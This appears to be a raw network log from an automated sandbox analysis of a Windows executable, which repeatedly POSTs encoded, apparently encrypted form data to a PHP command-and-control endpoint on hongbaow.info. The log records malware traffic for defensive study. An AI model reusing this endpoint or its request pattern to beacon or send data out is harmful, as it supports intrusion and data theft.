                                      2025-01-22 07:41:52 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:41:52 UTC96OUTData Raw: 75 69 66 62 61 73 69 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: uifbasi=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:41:52 UTC834INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:41:52 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      Vary: Accept-Encoding
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9J6K1wIXh%2BL5ZTcgSuo3ergUUPupDAaq%2Blb4iTLPFfedIGFCWmLkcPd53s7FgwU3Okn%2FPB7dNev0T9O1IKjZlkJC%2BHZPBrWGDi9yMlKXh6dLfK06xWtdCy5N4%2FKjHuK6"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de772d97a42eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1541&rtt_var=590&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1837633&cwnd=215&unsent_bytes=0&cid=86a45c8e6eb22a35&ts=324&x=0"
                                      2025-01-22 07:41:52 UTC274INData Raw: 31 30 62 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 55 6e 63 61 75 67 68 74 20 45 72 72 6f 72 3a 20 43 61 6c 6c 20 74 6f 20 61 20 6d 65 6d 62 65 72 20 66 75 6e 63 74 69 6f 6e 20 62 69 6e 64 5f 70 61 72 61 6d 28 29 20 6f 6e 20 62 6f 6f 6c 20 69 6e 20 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 31 57 72 43 56 7a 57 34 6b 53 44 4e 62 4e 54 74 2f 63 71 57 66 34 76 51 6c 6f 66 7a 71 46 6b 63 37 2e 70 68 70 3a 39 35 0a 53 74 61 63 6b 20 74 72 61 63 65 3a 0a 23 30 20 7b 6d 61 69 6e 7d 0a 20 20 74 68 72 6f 77 6e 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 31 57 72 43 56 7a 57 34 6b 53 44 4e 62 4e 54 74 2f 63 71 57 66 34 76 51 6c 6f 66 7a 71 46 6b 63 37 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65
                                      Data Ascii: 10b<br /><b>Fatal error</b>: Uncaught Error: Call to a member function bind_param() on bool in /var/www/html/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php:95Stack trace:#0 {main} thrown in <b>/var/www/html/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php</b> on line
                                      2025-01-22 07:41:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449735104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:41:53 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:41:53 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:41:53 UTC806INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:41:53 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6U8wRYUMRBLnuNb43PoG4B0xXGkyQGo0Kxq6YoPjjBAjWQoDV4XpUORQuhisgxVGo1hsrFqpNA1gMYxNsEySX2vBSxXp4LiAScUh2FgEmKtiVLjIgnDeSNyv45%2BQR%2FyW"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de7780c3443be-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1617&rtt_var=657&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1805813&cwnd=231&unsent_bytes=0&cid=1ad4b90970cae89e&ts=352&x=0"
                                      2025-01-22 07:41:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449736104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:41:56 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:41:56 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:41:56 UTC807INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:41:56 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xU5CXPbh6cQOtHVe33Js6RjVsXma5CxClnCot%2FuPaVDIwn3gtq6EuW51EyFKp8lNjRE%2FpQOhsq7VSjZhCYlz4cZFx5dyU1IaabjNJQS3RzKG0ze5FCxyhc34ef%2FSVabv"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de78abb568ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1766&rtt_var=692&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1547429&cwnd=162&unsent_bytes=0&cid=cc20346143f8c1c7&ts=323&x=0"
                                      2025-01-22 07:41:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449737104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:41:59 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:41:59 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:41:59 UTC818INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:41:59 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2FqL8k%2BP%2FRfCJSB45xxKFby9NHNi5WXS6VoxT21Tfy%2B%2Bf26Wje7RtNg39MGfzloUXNOoyPK5RnfipkH87tJ%2FlWMA8sN8MchVp1cnammJy0G9Op%2BCPIB6rlQgQrWC4x5T"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de79c7e448c11-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1828&min_rtt=1806&rtt_var=722&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1468812&cwnd=203&unsent_bytes=0&cid=29c2cb50812125c7&ts=350&x=0"
                                      2025-01-22 07:41:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.449738104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:41:59 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:41:59 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:00 UTC801INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:00 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vz9x5z7VAwKDKnacjrUbYt7UZnwUUmZbn4OuW8Uwxx7sUcQiJYDZ5c6HuQ9Ev65ELKvJHDf9ea9uxC40i35AxSPbQwgiwgliT7f1Y9DjROaH7UW5ca6WjgB3nvRFKaDa"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de7a26a91f5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1439&min_rtt=1432&rtt_var=551&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1962365&cwnd=107&unsent_bytes=0&cid=f4d346a9a249e9e2&ts=323&x=0"
                                      2025-01-22 07:42:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.449739104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:03 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:03 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:04 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:04 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdBBFWcUTvQqt4Bet6tfqoJyBHotikbvxJCIV4%2BSUaySburXRev4QtSTZ0iRxaMwWnqTiLk1cLOYCjJ1zcrZGsypCbJ%2FK2T1vFVqumJJ%2FCbR5%2B42f2E2BjiNaLWZahOe"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de7ba289ec470-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1532&min_rtt=1532&rtt_var=575&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1901041&cwnd=219&unsent_bytes=0&cid=140d71142c0ed3aa&ts=342&x=0"
                                      2025-01-22 07:42:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.449741104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:04 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:04 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:42:05 UTC810INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:05 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NWBlQpooIGscdvYNCAorYn80bnNoNIsih%2FxDKjNcMlGLW6EWIxmQpcae2gBKq8Cr3IfXiBW%2ByVJ8kDa0WfTIrQ7XYKObWnPtszh%2Bo9qrKijL4sPfCzV7B2lbq0eH%2BWJY"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de7c0edee43be-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1515&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1836477&cwnd=231&unsent_bytes=0&cid=f30dee2f4a604ba6&ts=344&x=0"
                                      2025-01-22 07:42:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.449746104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:07 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:07 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:07 UTC805INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:07 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MauRBRT9WN98afhGl3adb63f7beymoq1TqvkevzVYlP2fBxfsPZEnrrBWxEUTiXCBzNqkc2xfmc0%2FQYhgTzZ27Hb3GIjyhAtbRIOH030fDAN%2Fa4UArmCzvxHHTvlX0SC"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de7d1cc3b42eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1553&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1773997&cwnd=215&unsent_bytes=0&cid=661257954b43bed1&ts=323&x=0"
                                      2025-01-22 07:42:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.455897104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:10 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:10 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:42:10 UTC808INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:10 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7%2BiCXGiAZRyqjezRrt4I7Bu9NNqH0dJrUMvUeIGyDmDNDNSl%2F1PWXAwlHgrxXryoK%2BlKGtHc0oyteXgJjkzNydJ9tPaEy8hP3rUtVEyAeCFvu3YJIotxgcfiek7Ry7a"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de7e53c2c42eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1559&rtt_var=591&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1842271&cwnd=215&unsent_bytes=0&cid=298e203bd7824d52&ts=323&x=0"
                                      2025-01-22 07:42:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.455898104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:11 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:11 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:11 UTC801INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:11 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hnZLdhRhqz0fJiRjIQiCCRTxxKM17E7UgBY9m3jzsEEM61Q4cB0Tme7ccKt9HUoOMywQ23Xeep9Z7WTHLIke9RRoGglB5ja2j6DKOGwxRhJtD4AVuzOl7lfvPG0sFyJ6"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de7e96c6c8c11-EWR
